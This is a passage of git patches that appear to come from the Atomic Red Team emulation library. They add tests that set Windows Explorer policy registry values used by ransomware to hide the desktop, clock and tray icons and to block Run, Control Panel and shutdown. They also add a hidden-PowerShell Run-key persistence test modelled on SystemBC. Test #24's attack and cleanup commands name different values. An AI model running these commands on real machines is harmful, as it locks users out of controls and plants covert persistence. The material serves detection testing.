+          /v NoSetTaskbar /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoSetTaskbar /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoTrayContextMenu Group Policy Feature
+      auto_generated_guid: 4d72d4b1-fa7b-4374-b423-0fe326da49d2
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable context menu for taskbar Group Policy. \nTake note
+        that some Group Policy changes might require a restart to take effect.\nSee
+        how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v StartMenuLogOff /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoTrayContextMenu /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoPropertiesMyDocuments Group Policy Feature
+      auto_generated_guid: 20fc9daa-bd48-4325-9aff-81b967a84b1d
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to hide Properties from \"My Documents icon\" Group Policy.
+        \nTake note that some Group Policy changes might require a restart to take
+        effect.\nSee how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\"
+          /v NoPropertiesMyDocuments /t REG_DWORD /d 1 \n"
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoPropertiesMyDocuments /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Hide Windows Clock Group Policy Feature
+      auto_generated_guid: 8023db1e-ad06-4966-934b-b6a0ae52689e
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Hide Clock Group Policy. \nTake note that some Group Policy
+        changes might require a restart to take effect.\nSee how ransomware abuses
+        this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideClock /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideClock /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCAHealth Group Policy Feature
+      auto_generated_guid: a4637291-40b1-4a96-8c82-b28f1d73e54e
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove security and maintenance icon Group Policy. \nTake
+        note that some Group Policy changes might require a restart to take effect.\nSee
+        how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAHealth /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAHealth /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCANetwork Group Policy Feature
+      auto_generated_guid: 3e757ce7-eca0-411a-9583-1c33b8508d52
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove the networking icon Group Policy. \nTake note that
+        some Group Policy changes might require a restart to take effect.\nSee how
+        ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCANetwork /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCANetwork /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCAPower Group Policy Feature
+      auto_generated_guid: 8d85a5d8-702f-436f-bc78-fcd9119496fc
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove the battery icon Group Policy. \nTake note that
+        some Group Policy changes might require a restart to take effect.\nSee how
+        ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAPower /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAPower /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCAVolume Group Policy Feature
+      auto_generated_guid: 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove the volume icon Group Policy. \nTake note that some
+        Group Policy changes might require a restart to take effect..\nSee how ransomware
+        abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAVolume /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAVolume /f >nul 2>&1
+
 '
         name: command_prompt
         elevation_required: true
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 921e28c8..95ff2ab5 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -42,6 +42,34 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature)
 
+- [Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-17---activate-windows-nodesktop-group-policy-feature)
+
+- [Atomic Test #18 - Activate Windows NoRun Group Policy Feature](#atomic-test-18---activate-windows-norun-group-policy-feature)
+
+- [Atomic Test #19 - Activate Windows NoFind Group Policy Feature](#atomic-test-19---activate-windows-nofind-group-policy-feature)
+
+- [Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-20---activate-windows-nocontrolpanel-group-policy-feature)
+
+- [Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-21---activate-windows-nofilemenu-group-policy-feature)
+
+- [Atomic Test #22 - Activate Windows NoClose Group Policy Feature](#atomic-test-22---activate-windows-noclose-group-policy-feature)
+
+- [Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-23---activate-windows-nosettaskbar-group-policy-feature)
+
+- [Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-24---activate-windows-notraycontextmenu-group-policy-feature)
+
+- [Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-25---activate-windows-nopropertiesmydocuments-group-policy-feature)
+
+- [Atomic Test #26 - Hide Windows Clock Group Policy Feature](#atomic-test-26---hide-windows-clock-group-policy-feature)
+
+- [Atomic Test #27 - Windows HideSCAHealth Group Policy Feature](#atomic-test-27---windows-hidescahealth-group-policy-feature)
+
+- [Atomic Test #28 - Windows HideSCANetwork Group Policy Feature](#atomic-test-28---windows-hidescanetwork-group-policy-feature)
+
+- [Atomic Test #29 - Windows HideSCAPower Group Policy Feature](#atomic-test-29---windows-hidescapower-group-policy-feature)
+
+- [Atomic Test #30 - Windows HideSCAVolume Group Policy Feature](#atomic-test-30---windows-hidescavolume-group-policy-feature)
+
 
 <br/>
 
@@ -357,7 +385,7 @@ Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name Lo
 
 ## Atomic Test #9 - Disable Windows Registry Tool
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
-See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
 
 **Supported Platforms:** Windows
 
@@ -390,7 +418,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\
 
 ## Atomic Test #10 - Disable Windows CMD application
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
-See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
 
 **Supported Platforms:** Windows
 
@@ -423,7 +451,7 @@ reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "Di
 
 ## Atomic Test #11 - Disable Windows Task Manager application
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
-See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
 
 **Supported Platforms:** Windows
 
@@ -456,7 +484,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 
 ## Atomic Test #12 - Disable Windows Notification Center
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
-See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
 
 **Supported Platforms:** Windows
 
@@ -489,7 +517,7 @@ reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v Dis
 
 ## Atomic Test #13 - Disable Windows Shutdown Button
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
-See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
 
 **Supported Platforms:** Windows
 
@@ -522,7 +550,7 @@ reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policie
 
 ## Atomic Test #14 - Disable Windows LogOff Button
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
-See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
 
 **Supported Platforms:** Windows
 
@@ -557,7 +585,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 
 ## Atomic Test #15 - Disable Windows Change Password Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
-See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
 
 **Supported Platforms:** Windows
 
@@ -590,7 +618,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 
 ## Atomic Test #16 - Disable Windows Lock Workstation Feature
 Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
-See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
 
 **Supported Platforms:** Windows
 
@@ -618,4 +646,480 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 93386d41-525c-4a1b-8235-134a628dee17
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #18 - Activate Windows NoRun Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d49ff3cc-8168-4123-b5b3-f057d9abbd55
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - Activate Windows NoFind Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ffbb407e-7f1d-4c95-b22e-548169db1fbd
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a450e469-ba54-4de1-9deb-9023a6111690
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #22 - Activate Windows NoClose Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 12f50e15-dbc6-478b-a801-a746e8ba1723
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d29b7faf-7355-4036-9ed3-719bd17951ed
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4d72d4b1-fa7b-4374-b423-0fe326da49d2
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 20fc9daa-bd48-4325-9aff-81b967a84b1d
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #26 - Hide Windows Clock Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8023db1e-ad06-4966-934b-b6a0ae52689e
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #27 - Windows HideSCAHealth Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a4637291-40b1-4a96-8c82-b28f1d73e54e
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #28 - Windows HideSCANetwork Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3e757ce7-eca0-411a-9583-1c33b8508d52
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #29 - Windows HideSCAPower Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect.
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8d85a5d8-702f-436f-bc78-fcd9119496fc
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #30 - Windows HideSCAVolume Group Policy Feature
+Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
+Take note that some Group Policy changes might require a restart to take effect..
+See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

From 08dd613bb00fe95cefa3c897dbfedfe1f680f39a Mon Sep 17 00:00:00 2001
From: CyberBilly7 <91810178+CyberBilly7@users.noreply.github.com>
Date: Tue, 15 Mar 2022 22:52:20 -0500
Subject: [PATCH 56/83] systembc (#1814)

Co-authored-by: Chase James <cjames@nti.local>
---
 atomics/T1547.001/T1547.001.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 3c41bed1..c2475081 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -151,3 +151,27 @@ atomic_tests:
     command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f  
     cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
     name: command_prompt
+
+- name: SystemBC Malware-as-a-Service Registry
+  description: |
+      This Atomic will create a registry key called socks5_powershell for persistance access
+      https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+  supported_platforms:
+  - windows
+  input_arguments:
+    reg_key_value:
+      description: Thing to Run
+      type: Path
+      default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+    reg_key_path:
+      description: Path to registry key to update
+      type: Path
+      default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+  executor:
+    command: |
+      $RunKey = "#{reg_key_path}"
+      Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+    cleanup_command: |
+      Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
+    name: powershell
+    

From 37f0539284c8c6d2a5eab913fe17be948f6bcd3b Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Wed, 16 Mar 2022 03:52:52 +0000
Subject: [PATCH 57/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1547.001/T1547.001.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index c2475081..d5d1c5ef 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -153,6 +153,7 @@ atomic_tests:
     name: command_prompt
 
 - name: SystemBC Malware-as-a-Service Registry
